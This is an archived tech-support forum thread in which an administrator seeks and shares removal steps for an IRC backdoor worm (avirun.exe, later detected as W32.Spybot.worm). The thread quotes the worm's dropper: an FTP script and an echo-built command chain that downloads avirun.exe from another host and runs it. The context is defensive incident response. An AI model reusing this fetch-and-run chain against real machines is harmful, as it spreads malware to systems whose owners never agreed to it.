?
Solved

unknown virus / backdoor trojan for IRC

Posted on 2004-11-04
5
Medium Priority
?
351 Views
Last Modified: 2013-12-04
i have discovered a viurs/backdoor trojan which i cannot find a resolution for.  i have pieces of the virus, but not the entire puzzle to clean the infected machines.  i have searched google, symantec, etc. for the process name (avirun.exe) but it was prob mutated.  here is what i have:

on windows 2000 and XP boxes i found a process that runs called avirun.exe. when it runs it makes the computer unable to accept connections mainly because the virus is opening the box to an IRC channel.  i have to reboot inorder to delete the avirun.exe, but first i have to delete all the "MSConfig" = "avirun.exe" out of the registry keys (and there are quit a few).  however, this prcoess comes back. i then found a file, named simply as "o" which is displayed below.  it looks as if this file FTP's the avirun.exe from another infected machine.  even if i delete all the entries, the avirun.exe and the o file, it still comes back.  making me think that it spreads via a Windows exploit.  i could not find any file (i checked recently mofied files) that is a batch that would call the o file to download the .exe or any other executables in the regedit Run's.  it looks like the Backdoor.Hacarmy.E trojan, except that it keeps coming back.

has anyone seen this? if so, is there a removal tool.  i think if you fully patch the OS and delete all parts, it will stay away, but i need to be able to get rid of it on unpatched systems to stop the spread.

FYI, a full symantec scan via the Internet or newest def's come up clean.

o file:

open [ip address] [port]
user 1 1
get avirun.exe
quit
0
Comment
Question by:xxgenius
  • 2
  • 2
5 Comments
 
LVL 17

Expert Comment

by:Lobo042399
ID: 12500195
Hi xxgenius,

It sounds very interesting. The behaviour is that of a trojan. First thing I'd do is to download ProcessExplorer and run it. Look for the avirun and the o processes. in ProcessExplorer, souble-clicking on a process will bring up a wealth of info, including Registry keys and the IP number to which the process is connecting. If you have a Firewall, you can create a rule to block access to hat IP and then use KillBox to kill the offending files, but specially the o file, which is the monitor/downloader. Then you can use the info gathered from ProcessExplorer to clean up your Registry.

You can download ProcessExplorer and KillBox from:

http://www.gatesofdelirium.com/ee/tools/

By the way, before deleting these files I'd make a Zip file with them and send it to the guys at McAffee and Symantec for research.

Good Vibes!

Lobo
0
 
LVL 8

Author Comment

by:xxgenius
ID: 12503735
These have been sent to Symantec and Sybari (which then dipurses them to other engines).  According to Symantec, their latest Rapid Response would catch it (haven't tried it yet).  I can say that your Windows must be patched and then you can delete the files.  Here is what the avirun.exe does when executed:

C:\WINDOWS\system32>avirun.exe
echo open [IPaddress Port] > o&echo user 1 1 >> o &echo get avirun.exe >> o &echo quit >> o &ftp -n -s:o &avirun.exe
0
 
LVL 8

Author Comment

by:xxgenius
ID: 12504856
symantec definitions 11/5/04 Rev 5 will detect it as W32.Spybot.worm.  

To rid your machine: fully patch with windows and reboot.  then run antiv and delete files it finds.  delete the "o" file. open regedit, search for all strings for the process and delete.
0
 
LVL 1

Accepted Solution

by:
GhostMod earned 0 total points
ID: 12508791
PAQd, 250 points refunded - asker posted solution

GhostMod
Community Support Moderator
0
 
LVL 17

Expert Comment

by:Lobo042399
ID: 12510147
kewlio
0

Featured Post

Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Users of Windows 10 Professional can disable automatic reboots using the policy editor. This tool is not included in the Windows home edition. But don't worry! Follow the instructions below to install (a Win7) policy editor on your Windows 10 Home e…
Security measures require Windows be logged in using Standard User login (not Administrator).  Yet, sometimes an application has to be run “As Administrator” from a Standard User login.  This paper describes how to create a shortcut icon to launch a…
this video summaries big data hadoop online training demo (http://onlineitguru.com/big-data-hadoop-online-training-placement.html) , and covers basics in big data hadoop .
We’ve all felt that sense of false security before—locking down external access to a database or component and feeling like we’ve done all we need to do to secure company data. But that feeling is fleeting. Attacks these days can happen in many w…
Suggested Courses

864 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question